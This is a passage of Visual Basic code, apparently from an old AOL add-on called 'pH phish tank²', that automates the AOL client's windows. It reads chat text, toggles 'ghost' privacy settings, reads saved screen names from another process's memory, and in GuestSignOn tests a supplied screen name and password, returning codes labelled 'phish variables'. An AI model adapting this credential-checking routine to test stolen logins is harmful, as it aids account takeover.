  4091. rCNTL& = FindWindowEx(rWin&, 0&, "RICHCNTL", vbNullString)
  4092. GetChatText$ = GetText(rCNTL&)
  4093. End Function
  4094.  
  4095. Public Function GetChatText25() As String
  4096. 'gets the text from a aol 2.5 or 3.0 chat room
  4097. Dim rWin As Long, rView As Long
  4098.  
  4099. rWin& = FindRoom25&
  4100. If rWin& = 0& Then GetChatText25$ = "": Exit Function
  4101.  
  4102. rView& = FindWindowEx(rWin&, 0&, "_AOL_View", vbNullString)
  4103. GetChatText25$ = GetText(rView&)
  4104. End Function
  4105. Public Function GetaimSN()
  4106. Dim Window&, Caption$
  4107. Window& = FindWindow("_Oscar_BuddylistWin", vbNullString)
  4108. If Window& = 0 Then
  4109. GetaimSN = "n/a"
  4110. Exit Function
  4111. End If
  4112. Caption$ = GetCaption(Window&)
  4113. GetaimSN = Left(Caption$, InStr(Caption$, "'") - 1)
  4114. End Function
  4115. Public Function GetCaption(WindowHandle As Long) As String
  4116. Dim buffer As String, textlength As Long
  4117. textlength& = GetWindowTextLength(WindowHandle&)
  4118. buffer$ = String(textlength&, 0&)
  4119. Call GetWindowText(WindowHandle&, buffer$, textlength& + 1)
  4120. GetCaption$ = buffer$
  4121. End Function
  4122.  
  4123. Public Function GetFileName(file As String) As String
  4124. 'gets the actual filename w/o the folders..
  4125. 'example:
  4126. 'strFN$ = GetFileName("c:\windows\desktop\kai.exe")
  4127. 'that would make the variable 'strFN' = "kai.exe"
  4128. 'i hope that explains it
  4129. Dim gFN As Long, gChr As String, gString As String
  4130.  
  4131. For gFN = 1 To Len(file$)
  4132. gChr$ = Mid(file$, gFN&, 1)
  4133. If gChr$ = "\" Then
  4134. gString$ = Right(file$, Len(file$) - gFN&)
  4135. End If
  4136. Next gFN
  4137.  
  4138. GetFileName$ = gString$
  4139. End Function
  4140.  
  4141. Public Function GetFromINI(AppName As String, KeyName As String, FileName As String) As String
  4142. 'gets from ini
  4143. 'i might write an example
  4144. 'on how to use ini's
  4145. 'a little later
  4146. Dim strBuf As String
  4147. strBuf = String(750, Chr(0))
  4148. KeyName$ = LCase$(KeyName$)
  4149. GetFromINI$ = Left(strBuf, GetPrivateProfileString(AppName$, ByVal KeyName$, "", strBuf, Len(strBuf), FileName$))
  4150. End Function
  4151.  
  4152. Public Function GetSignonSN(Index As Long) As String
  4153. 'gets signon screen name.. using 'index'
  4154. On Error Resume Next
  4155. Dim aol As Long, mdi As Long, win As Long, Combo As Long
  4156. Dim oCombo As Long, oReal As Long
  4157. Dim cProcess As Long, itmHold As Long, screenname As String
  4158. Dim psnHold As Long, rBytes As Long
  4159. Dim rList As Long, sThread As Long, mThread As Long
  4160.  
  4161. win& = FindSignOnWindow
  4162.  
  4163. If win& = 0& Then GetSignonSN = "": Exit Function
  4164.  
  4165. Combo& = FindWindowEx(win&, 0&, "_AOL_Combobox", vbNullString)
  4166. oCombo& = FindWindow("#32769", vbNullString)
  4167. oReal& = FindWindowEx(oCombo&, 0&, "ComboLBox", vbNullString)
  4168. rList = Combo ' oReal&
  4169. Call SendMessage(Combo&, WM_LBUTTONDOWN, 0&, 0&)
  4170. Call SendMessage(Combo&, WM_LBUTTONUP, 0&, 0&)
  4171. sThread& = GetWindowThreadProcessId(rList, cProcess&)
  4172. mThread& = OpenProcess(PROCESS_READ Or RIGHTS_REQUIRED, False, cProcess&)
  4173. If mThread& Then
  4174. If Index& < SendMessage(rList, CB_GETCOUNT, 0, 0) Then
  4175. screenname$ = String$(4, vbNullChar)
  4176. itmHold& = SendMessage(rList, CB_GETITEMDATA, ByVal CLng(Index&), ByVal 0&)
  4177. itmHold& = itmHold& + 24
  4178. Call ReadProcessMemory(mThread&, itmHold&, screenname$, 4, rBytes)
  4179. Call CopyMemory(psnHold&, ByVal screenname$, 4)
  4180. psnHold& = psnHold& + 6
  4181. screenname$ = String$(16, vbNullChar)
  4182. Call ReadProcessMemory(mThread&, psnHold&, screenname$, Len(screenname$), rBytes&)
  4183. screenname$ = Left$(screenname$, InStr(screenname$, vbNullChar) - 1)
  4184. GetSignonSN = screenname$
  4185. Call CloseHandle(mThread)
  4186. Else
  4187. GetSignonSN = ""
  4188. End If
  4189. End If
  4190. Call SendMessage(Combo&, WM_LBUTTONDOWN, 0&, 0&)
  4191. Call SendMessage(Combo&, WM_LBUTTONUP, 0&, 0&)
  4192. End Function
  4193.  
  4194. Public Function GetText(hWnd As Long) As String
  4195. 'gets the text of any window using it's handle
  4196. Dim tLen As Long, tBuf As String
  4197.  
  4198. tLen& = SendMessage(hWnd&, WM_GETTEXTLENGTH, 0&, 0&)
  4199. tBuf$ = String(tLen&, 0&)
  4200. Call SendMessageByString(hWnd&, WM_GETTEXT, tLen& + 1, tBuf$)
  4201. GetText$ = tBuf$
  4202. End Function
  4203.  
  4204. Public Function GetUser() As String
  4205. 'current aol user
  4206. 'if user is offline, then getuser = ""
  4207. Dim wWin As Long, wStr As String, iWelcome As Long, iExc As Long
  4208.  
  4209. wWin& = FindWelcome
  4210. If wWin& = 0& Then GetUser = "": Exit Function
  4211.  
  4212. wStr$ = GetText(wWin&)
  4213. iWelcome& = InStr(1, wStr$, "Welcome, ")
  4214. iExc& = InStr(1, wStr$, "!")
  4215. GetUser$ = Mid(wStr$, iWelcome& + Len("Welcome, "), iExc& - (iWelcome& + Len("Welcome, ")))
  4216. End Function
  4217.  
  4218. Public Sub ghostoff()
  4219. 'turns off ghost on the current user's acct
  4220. Dim aol As Long, mdi As Long, bWin As Long, bIcon As Long
  4221. Dim sWin As Long, sIcon As Long, sLong As Long, mWin As Long, mBut As Long
  4222. Dim pWin As Long, pIcon As Long, pCheck As Long, pCheck2 As Long, pLong As Long
  4223.  
  4224. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  4225. Call GhostOff25
  4226. Exit Sub
  4227. End If
  4228.  
  4229. aol& = FindWindow("AOL Frame25", vbNullString)
  4230. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  4231.  
  4232. bWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Buddy List Window")
  4233. If bWin& = 0& Then
  4234. Call Keyword("bv")
  4235. Do
  4236. DoEvents
  4237. bWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Buddy List Window")
  4238. Loop Until bWin& <> 0&
  4239. pause (0.4)
  4240. End If
  4241.  
  4242. bIcon& = FindWindowEx(bWin&, 0&, "_AOL_Icon", vbNullString)
  4243. bIcon& = FindWindowEx(bWin&, bIcon&, "_AOL_Icon", vbNullString)
  4244. bIcon& = FindWindowEx(bWin&, bIcon&, "_AOL_Icon", vbNullString)
  4245.  
  4246. Call SendMessage(bIcon&, WM_LBUTTONDOWN, 0&, 0&)
  4247. Call SendMessage(bIcon&, WM_LBUTTONUP, 0&, 0&)
  4248.  
  4249. Do
  4250. DoEvents
  4251. sWin& = FindBuddyLists
  4252. sIcon& = FindWindowEx(sWin&, 0&, "_AOL_Icon", vbNullString)
  4253. For sLong& = 1 To 4
  4254. sIcon& = FindWindowEx(sWin&, sIcon&, "_AOL_Icon", vbNullString)
  4255. Next sLong&
  4256. Loop Until sWin& <> 0& And sIcon& <> 0&
  4257.  
  4258. Call SendMessage(sIcon&, WM_LBUTTONDOWN, 0&, 0&)
  4259. Call SendMessage(sIcon&, WM_LBUTTONUP, 0&, 0&)
  4260.  
  4261. Do
  4262. DoEvents
  4263. pause (0.4)
  4264. pWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Privacy Preferences")
  4265. pCheck& = FindWindowEx(pWin&, 0&, "_AOL_Checkbox", vbNullString)
  4266. pCheck2& = FindWindowEx(pWin&, pCheck&, "_AOL_Checkbox", vbNullString)
  4267. pCheck2& = FindWindowEx(pWin&, pCheck2&, "_AOL_Checkbox", vbNullString)
  4268. pCheck2& = FindWindowEx(pWin&, pCheck2&, "_AOL_Checkbox", vbNullString)
  4269. pCheck2& = FindWindowEx(pWin&, pCheck2&, "_AOL_Checkbox", vbNullString)
  4270. pCheck2& = FindWindowEx(pWin&, pCheck2&, "_AOL_Checkbox", vbNullString)
  4271. pIcon& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
  4272. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  4273. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  4274. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  4275. Loop Until pWin& <> 0& And pCheck2 <> 0& And pIcon <> 0&
  4276.  
  4277. Call SendMessage(pCheck&, WM_LBUTTONDOWN, 0&, 0&)
  4278. Call SendMessage(pCheck&, WM_LBUTTONUP, 0&, 0&)
  4279.  
  4280. Call SendMessage(pCheck2&, WM_LBUTTONDOWN, 0&, 0&)
  4281. Call SendMessage(pCheck2&, WM_LBUTTONUP, 0&, 0&)
  4282.  
  4283. Call SendMessage(pIcon&, WM_LBUTTONDOWN, 0&, 0&)
  4284. Call SendMessage(pIcon&, WM_LBUTTONUP, 0&, 0&)
  4285.  
  4286. Do
  4287. DoEvents
  4288. mWin& = FindWindow("#32770", "America Online")
  4289. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  4290. Loop Until mWin& <> 0& And mBut& <> 0&
  4291.  
  4292. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  4293. Call PostMessage(mBut&, WM_KEYUP, VK_SPACE, 0&)
  4294.  
  4295. Call PostMessage(sWin&, WM_CLOSE, 0&, 0&)
  4296. End Sub
  4297.  
  4298. Public Sub GhostOff25()
  4299. 'turns off ghost on the current user's acct
  4300. Dim aol As Long, mdi As Long, bWin As Long, bIcon As Long
  4301. Dim sWin As Long, sIcon As Long, mWin As Long, mBut As Long
  4302. Dim pWin As Long, pCheck As Long, pCheck2 As Long, pIcon As Long
  4303.  
  4304. aol& = FindWindow("AOL Frame25", vbNullString)
  4305. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  4306.  
  4307. bWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Buddy List Window")
  4308. If bWin& = 0& Then
  4309. Call KeyWord25("bv")
  4310. Do
  4311. DoEvents
  4312. bWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Buddy List Window")
  4313. Loop Until bWin& <> 0&
  4314. End If
  4315. bIcon& = FindWindowEx(bWin&, 0&, "_AOL_Icon", vbNullString)
  4316. bIcon& = FindWindowEx(bWin&, bIcon&, "_AOL_Icon", vbNullString)
  4317. bIcon& = FindWindowEx(bWin&, bIcon&, "_AOL_Icon", vbNullString)
  4318.  
  4319. Call SendMessage(bIcon&, WM_LBUTTONDOWN, 0&, 0&)
  4320. Call SendMessage(bIcon&, WM_LBUTTONUP, 0&, 0&)
  4321.  
  4322. Do
  4323. DoEvents
  4324. sWin& = FindBuddyLists
  4325. sIcon& = FindWindowEx(sWin&, 0&, "_AOL_Icon", vbNullString)
  4326. sIcon& = FindWindowEx(sWin&, sIcon&, "_AOL_Icon", vbNullString)
  4327. sIcon& = FindWindowEx(sWin&, sIcon&, "_AOL_Icon", vbNullString)
  4328. sIcon& = FindWindowEx(sWin&, sIcon&, "_AOL_Icon", vbNullString)
  4329. sIcon& = FindWindowEx(sWin&, sIcon&, "_AOL_Icon", vbNullString)
  4330. Loop Until sWin& <> 0& And sIcon& <> 0&
  4331.  
  4332. Call SendMessage(sIcon&, WM_LBUTTONDOWN, 0&, 0&)
  4333. Call SendMessage(sIcon&, WM_LBUTTONUP, 0&, 0&)
  4334.  
  4335. Do
  4336. DoEvents
  4337. pWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Privacy Preferences")
  4338. pCheck& = FindWindowEx(pWin&, 0&, "_AOL_Button", vbNullString)
  4339. pCheck2& = FindWindowEx(pWin&, pCheck&, "_AOL_Button", vbNullString)
  4340. pCheck2& = FindWindowEx(pWin&, pCheck2&, "_AOL_Button", vbNullString)
  4341. pCheck2& = FindWindowEx(pWin&, pCheck2&, "_AOL_Button", vbNullString)
  4342. pCheck2& = FindWindowEx(pWin&, pCheck2&, "_AOL_Button", vbNullString)
  4343. pCheck2& = FindWindowEx(pWin&, pCheck2&, "_AOL_Button", vbNullString)
  4344. pIcon& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
  4345. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  4346. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  4347. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  4348. Loop Until pWin& <> 0& And pCheck2& <> 0& And pIcon& <> 0&
  4349.  
  4350. pIcon& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
  4351. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  4352. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  4353. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  4354.  
  4355. Call PostMessage(pCheck&, WM_KEYDOWN, VK_SPACE, 0&)
  4356. Call PostMessage(pCheck&, WM_KEYUP, VK_SPACE, 0&)
  4357.  
  4358. Call PostMessage(pCheck2&, WM_KEYDOWN, VK_SPACE, 0&)
  4359. Call PostMessage(pCheck2&, WM_KEYUP, VK_SPACE, 0&)
  4360.  
  4361. pause (0.6)
  4362.  
  4363. Call SendMessage(pIcon&, WM_LBUTTONDOWN, 0&, 0&)
  4364. Call SendMessage(pIcon&, WM_LBUTTONUP, 0&, 0&)
  4365.  
  4366. Do
  4367. DoEvents
  4368. mWin& = FindWindow("#32770", "America Online")
  4369. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  4370. Loop Until mWin& <> 0& And mBut& <> 0&
  4371.  
  4372. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  4373. Call PostMessage(mBut&, WM_KEYUP, VK_SPACE, 0&)
  4374.  
  4375. Call PostMessage(sWin&, WM_CLOSE, 0&, 0&)
  4376. End Sub
  4377.  
  4378. Public Sub ghoston()
  4379. 'makes current users account 'ghost'
  4380. Dim aol As Long, mdi As Long, bWin As Long, bIcon As Long
  4381. Dim sWin As Long, sIcon As Long, sLong As Long, mWin As Long, mBut As Long
  4382. Dim pWin As Long, pIcon As Long, pCheck As Long, pCheck2 As Long, pLong As Long
  4383.  
  4384. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  4385. Call GhostOn25
  4386. Exit Sub
  4387. End If
  4388.  
  4389. aol& = FindWindow("AOL Frame25", vbNullString)
  4390. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  4391.  
  4392. bWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Buddy List Window")
  4393. If bWin& = 0& Then
  4394. Call Keyword("bv")
  4395. Do
  4396. DoEvents
  4397. bWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Buddy List Window")
  4398. Loop Until bWin& <> 0&
  4399. pause (0.5)
  4400. End If
  4401.  
  4402. bIcon& = FindWindowEx(bWin&, 0&, "_AOL_Icon", vbNullString)
  4403. bIcon& = FindWindowEx(bWin&, bIcon&, "_AOL_Icon", vbNullString)
  4404. bIcon& = FindWindowEx(bWin&, bIcon&, "_AOL_Icon", vbNullString)
  4405.  
  4406. Call SendMessage(bIcon&, WM_LBUTTONDOWN, 0&, 0&)
  4407. Call SendMessage(bIcon&, WM_LBUTTONUP, 0&, 0&)
  4408.  
  4409. Do
  4410. DoEvents
  4411. sWin& = FindBuddyLists
  4412. sIcon& = FindWindowEx(sWin&, 0&, "_AOL_Icon", vbNullString)
  4413. For sLong& = 1 To 4
  4414. sIcon& = FindWindowEx(sWin&, sIcon&, "_AOL_Icon", vbNullString)
  4415. Next sLong&
  4416. Loop Until sWin& <> 0& And sIcon& <> 0&
  4417.  
  4418. Call SendMessage(sIcon&, WM_LBUTTONDOWN, 0&, 0&)
  4419. Call SendMessage(sIcon&, WM_LBUTTONUP, 0&, 0&)
  4420.  
  4421. Do
  4422. DoEvents
  4423. pWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Privacy Preferences")
  4424. pCheck& = FindWindowEx(pWin&, 0&, "_AOL_Checkbox", vbNullString)
  4425. For pLong& = 1 To 4
  4426. pCheck& = FindWindowEx(pWin&, pCheck&, "_AOL_Checkbox", vbNullString)
  4427. Next pLong&
  4428. pCheck2& = FindWindowEx(pWin&, pCheck&, "_AOL_Checkbox", vbNullString)
  4429. pCheck2& = FindWindowEx(pWin&, pCheck2&, "_AOL_Checkbox", vbNullString)
  4430. pIcon& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
  4431. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  4432. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  4433. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  4434. Loop Until pWin& <> 0& And pCheck2 <> 0& And pIcon <> 0&
  4435.  
  4436. Call SendMessage(pCheck&, WM_LBUTTONDOWN, 0&, 0&)
  4437. Call SendMessage(pCheck&, WM_LBUTTONUP, 0&, 0&)
  4438.  
  4439. Call SendMessage(pCheck2&, WM_LBUTTONDOWN, 0&, 0&)
  4440. Call SendMessage(pCheck2&, WM_LBUTTONUP, 0&, 0&)
  4441.  
  4442. Call SendMessage(pIcon&, WM_LBUTTONDOWN, 0&, 0&)
  4443. Call SendMessage(pIcon&, WM_LBUTTONUP, 0&, 0&)
  4444.  
  4445. Do
  4446. DoEvents
  4447. mWin& = FindWindow("#32770", "America Online")
  4448. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  4449. Loop Until mWin& <> 0& And mBut& <> 0&
  4450.  
  4451. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  4452. Call PostMessage(mBut&, WM_KEYUP, VK_SPACE, 0&)
  4453.  
  4454. Call PostMessage(sWin&, WM_CLOSE, 0&, 0&)
  4455. End Sub
  4456.  
  4457. Public Sub GhostOn25()
  4458. 'makes current users account 'ghost'
  4459. Dim aol As Long, mdi As Long, bWin As Long, bIcon As Long
  4460. Dim sWin As Long, sIcon As Long, mWin As Long, mBut As Long
  4461. Dim pWin As Long, pCheck As Long, pCheck2 As Long, pIcon As Long
  4462.  
  4463. aol& = FindWindow("AOL Frame25", vbNullString)
  4464. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  4465.  
  4466. bWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Buddy List Window")
  4467. If bWin& = 0& Then
  4468. Call KeyWord25("bv")
  4469. Do
  4470. DoEvents
  4471. bWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Buddy List Window")
  4472. Loop Until bWin& <> 0&
  4473. pause (0.4)
  4474. End If
  4475. bIcon& = FindWindowEx(bWin&, 0&, "_AOL_Icon", vbNullString)
  4476. bIcon& = FindWindowEx(bWin&, bIcon&, "_AOL_Icon", vbNullString)
  4477. bIcon& = FindWindowEx(bWin&, bIcon&, "_AOL_Icon", vbNullString)
  4478.  
  4479. Call SendMessage(bIcon&, WM_LBUTTONDOWN, 0&, 0&)
  4480. Call SendMessage(bIcon&, WM_LBUTTONUP, 0&, 0&)
  4481.  
  4482. Do
  4483. DoEvents
  4484. sWin& = FindBuddyLists
  4485. sIcon& = FindWindowEx(sWin&, 0&, "_AOL_Icon", vbNullString)
  4486. sIcon& = FindWindowEx(sWin&, sIcon&, "_AOL_Icon", vbNullString)
  4487. sIcon& = FindWindowEx(sWin&, sIcon&, "_AOL_Icon", vbNullString)
  4488. sIcon& = FindWindowEx(sWin&, sIcon&, "_AOL_Icon", vbNullString)
  4489. sIcon& = FindWindowEx(sWin&, sIcon&, "_AOL_Icon", vbNullString)
  4490. Loop Until sWin& <> 0& And sIcon& <> 0&
  4491.  
  4492. Call SendMessage(sIcon&, WM_LBUTTONDOWN, 0&, 0&)
  4493. Call SendMessage(sIcon&, WM_LBUTTONUP, 0&, 0&)
  4494.  
  4495. Do
  4496. DoEvents
  4497. pWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Privacy Preferences")
  4498. 'pCheck& = FindWindowEx(pWin&, 0&, "_AOL_Button", "Allow all AOL members and AOL Instant Messenger")
  4499. pCheck& = FindWindowEx(pWin&, 0&, "_AOL_Button", "Block all AOL members and AOL Instant Messenger users")
  4500. pCheck2& = FindWindowEx(pWin&, pCheck&, "_AOL_Button", vbNullString)
  4501. pCheck2& = FindWindowEx(pWin&, pCheck2&, "_AOL_Button", vbNullString)
  4502. pIcon& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
  4503. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  4504. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  4505. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  4506. Loop Until pWin& <> 0& And pCheck2& <> 0& And pIcon& <> 0&
  4507.  
  4508. Call PostMessage(pCheck&, WM_KEYDOWN, VK_SPACE, 0&)
  4509. Call PostMessage(pCheck&, WM_KEYUP, VK_SPACE, 0&)
  4510.  
  4511. Call PostMessage(pCheck2&, WM_KEYDOWN, VK_SPACE, 0&)
  4512. Call PostMessage(pCheck2&, WM_KEYUP, VK_SPACE, 0&)
  4513.  
  4514. pause (0.6)
  4515. pIcon& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
  4516. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  4517. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  4518. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  4519.  
  4520. Call SendMessage(pIcon&, WM_LBUTTONDOWN, 0&, 0&)
  4521. Call SendMessage(pIcon&, WM_LBUTTONUP, 0&, 0&)
  4522.  
  4523. Do
  4524. DoEvents
  4525. mWin& = FindWindow("#32770", "America Online")
  4526. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  4527. Loop Until mWin& <> 0& And mBut& <> 0&
  4528.  
  4529. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  4530. Call PostMessage(mBut&, WM_KEYUP, VK_SPACE, 0&)
  4531.  
  4532. Call PostMessage(sWin&, WM_CLOSE, 0&, 0&)
  4533. End Sub
  4534.  
  4535. Public Function GuestSignOn(screenname As String, Password As String) As Integer
  4536. 'crappy signon code, it's from pH
  4537. 'the pwc4 and pwc25 subs are much better.
  4538.  
  4539. 'phish variables...
  4540. '1 = signed on correctly
  4541. '2 = incorret password
  4542. '3 = currently signed on
  4543. '4 = invalid acct [not active] / suspended
  4544. '5 = int account
  4545.  
  4546. 'example:
  4547. 'If GuestSignOn("kai", "123456") = 1 Then
  4548. ' bust into a room
  4549. 'Else
  4550. ' Call MsgBox("couldn't signon 'kai'", vbCritical + vbOKOnly, "signon error")
  4551. 'End If
  4552.  
  4553. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  4554. GuestSignOn = GuestSignOn25(screenname$, Password$)
  4555. Exit Function
  4556. End If
  4557.  
  4558. Dim aol As Long, mdi As Long, soWindow As Long, soEdit As Long, soButton As Long
  4559. Dim soCombo As Long, soButtonx As Long, cError As Long, cbut As Long
  4560. Dim guestwin As Long, guestEdit1 As Long, guestEdit2 As Long, guestButton As Long
  4561. Dim guestButton2 As Long, soAdios As Long, soWelcome As Long, soIncorrect As Long
  4562. Dim soIncStatic As Long, soIncString As String, soSignedOn As Long, soSignedStatic As Long
  4563. Dim soSignedText As String, soRICHCNTL As Long, soRICHText As String, sIDMod As Long, sIDBut As Long
  4564. Dim gbWin As Long, soStatic As String, signedonStr As String, incorrectBut As Long, signedonBut As Long, gbWin2 As Long
  4565.  
  4566. aol& = FindWindow("AOL Frame25", vbNullString)
  4567. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  4568.  
  4569. If aol& = 0& Then GuestSignOn = 0: Exit Function
  4570.  
  4571. If GetUser <> "" Then
  4572. Call SignOff
  4573. If IsNumeric(GetFromINI("ph2", "signon pause", App.Path + "\ph2.ini")) = True Then
  4574. pause (GetFromINI("ph2", "signon pause", App.Path + "\ph2.ini"))
  4575. End If
  4576. End If
  4577.  
  4578. Do
  4579. DoEvents
  4580. aol& = FindWindow("AOL Frame25", vbNullString)
  4581. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  4582. soWindow& = FindSignOnWindow
  4583. soEdit& = FindWindowEx(soWindow&, 0&, "_AOL_Edit", vbNullString)
  4584. soCombo& = FindWindowEx(soWindow&, 0&, "_AOL_ComboBox", vbNullString)
  4585. soButtonx& = FindWindowEx(soWindow&, 0&, "_AOL_Icon", vbNullString)
  4586. soButtonx& = FindWindowEx(soWindow&, soButtonx&, "_AOL_Icon", vbNullString)
  4587. soButtonx& = FindWindowEx(soWindow&, soButtonx&, "_AOL_Icon", vbNullString)
  4588. soButton& = FindWindowEx(soWindow&, soButtonx&, "_AOL_Icon", vbNullString)
  4589. If soButtonx& <> 0& And soButton& = 0& Then soButton& = soButtonx&
  4590. Loop Until soWindow& <> 0& And soCombo& <> 0& And soEdit& <> 0& And soButton& <> 0&
  4591.  
  4592. Call SendMessage(soCombo&, CB_SETCURSEL, SendMessage(soCombo&, CB_GETCOUNT, 0&, 0&) - 1, 0&)
  4593.  
  4594. Call ModalKill
  4595.  
  4596. Call SendMessageByString(soEdit&, WM_SETTEXT, 0&, "guestso")
  4597.  
  4598. Call SendMessageLong(soCombo&, WM_CHAR, ENTER_KEY, 0&)
  4599.  
  4600. Do
  4601. DoEvents
  4602. cError& = FindWindow("#32770", "The Connection Failed")
  4603. cbut& = FindWindowEx(cError&, 0&, "Button", "OK")
  4604. guestwin& = FindWindow("_AOL_Modal", vbNullString)
  4605. guestEdit1& = FindWindowEx(guestwin&, 0&, "_AOL_Edit", vbNullString)
  4606. guestEdit2& = FindWindowEx(guestwin&, guestEdit1&, "_AOL_Edit", vbNullString)
  4607. guestButton& = FindWindowEx(guestwin&, 0&, "_AOL_Icon", vbNullString)
  4608. guestButton2& = FindWindowEx(guestwin&, guestButton&, "_AOL_Icon", vbNullString)
  4609. Loop Until cError& <> 0& And cbut& <> 0& Or guestwin& <> 0& And guestEdit1& <> 0& And guestEdit2& <> 0& And guestButton& <> 0&
  4610.  
  4611. If cError& <> 0& Then
  4612. Call PostMessage(cbut&, WM_KEYDOWN, VK_SPACE, 0&)
  4613. Call PostMessage(cbut&, WM_KEYUP, VK_SPACE, 0&)
  4614. Call MsgBox("an error has occured.. make sure" + vbCrLf + "that you are connected to your tcp," + vbCrLf + "there aren't any busy signals, etc..", vbCritical + vbOKOnly, "pH phish tank²")
  4615. Exit Function
  4616. End If
  4617.  
  4618. Call SendMessageByString(guestEdit1&, WM_SETTEXT, 0&, screenname$)
  4619. Call SendMessageByString(guestEdit2&, WM_SETTEXT, 0&, Password$)
  4620.  
  4621. Call SendMessage(guestButton&, WM_LBUTTONDOWN, 0&, 0&)
  4622. Call SendMessage(guestButton&, WM_LBUTTONUP, 0&, 0&)
  4623.  
  4624. Do
  4625. DoEvents
  4626. aol& = FindWindow("AOL Frame25", vbNullString)
  4627. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  4628. soAdios& = FindWindowEx(mdi&, 0&, "AOL Child", "Goodbye from America Online!")
  4629. soWelcome& = FindWelcome
  4630. soIncorrect& = FindWindow("#32770", "America Online")
  4631. soIncStatic& = FindWindowEx(soIncorrect&, 0&, "Static", "Incorrect name and/or password, please re-enter")
  4632. soIncString$ = GetText(soIncStatic&)
  4633. soSignedOn& = FindWindow("#32770", "America Online")
  4634. soSignedStatic& = FindWindowEx(soSignedOn&, 0&, "Static", vbNullString)
  4635. soSignedStatic& = FindWindowEx(soSignedOn&, soSignedStatic&, "Static", vbNullString)
  4636. soSignedText$ = GetText(soSignedStatic&)
  4637. soRICHCNTL& = FindWindowEx(soAdios&, 0&, "RICHCNTL", vbNullString)
  4638. soRICHCNTL& = FindWindowEx(soAdios&, soRICHCNTL&, "RICHCNTL", vbNullString)
  4639. soRICHText$ = GetText(soRICHCNTL&)
  4640.  
  4641. sIDMod& = FindWindow("_AOL_Modal", "Security Code")
  4642. sIDBut& = FindWindowEx(sIDMod&, 0&, "_AOL_Icon", vbNullString)
  4643. sIDBut& = FindWindowEx(sIDMod&, sIDBut&, "_AOL_Icon", vbNullString)
  4644. If aol& = 0& Then Exit Function
  4645. Loop Until soIncorrect& <> 0& Or soAdios& <> 0& And soRICHCNTL <> 0& And InStr(1, soRICHText$, " not currently active.") <> 0& Or soAdios& <> 0& And soSignedOn& <> 0& Or soWelcome& <> 0& Or InStr(1, soRICHText$, "Invalid account") <> 0& Or InStr(1, soRICHText$, "account is not currently") <> 0& Or InStr(1, soRICHText$, "login process did not complete") <> 0& Or sIDMod& <> 0& And sIDBut& <> 0&
  4646.  
  4647. If InStr(1, soRICHText$, "Invalid account") <> 0& Or InStr(1, soRICHText$, "account is not currently") <> 0& Then
  4648. Call SendMessageByString(soRICHCNTL&, WM_SETTEXT, 0&, "")
  4649. GuestSignOn = 4
  4650. Exit Function
  4651. ElseIf InStr(1, soRICHText$, "login process did not complete") <> 0& Then
  4652. Call SendMessageByString(soRICHCNTL&, WM_SETTEXT, 0&, "")
  4653. GuestSignOn = 3
  4654. Exit Function
  4655. End If
  4656.  
  4657. If soWelcome& <> 0& Then
  4658. GuestSignOn = 1
  4659. Exit Function
  4660. ElseIf sIDMod& <> 0& Then
  4661. Call PostMessage(sIDBut&, WM_LBUTTONDOWN, 0&, 0&)
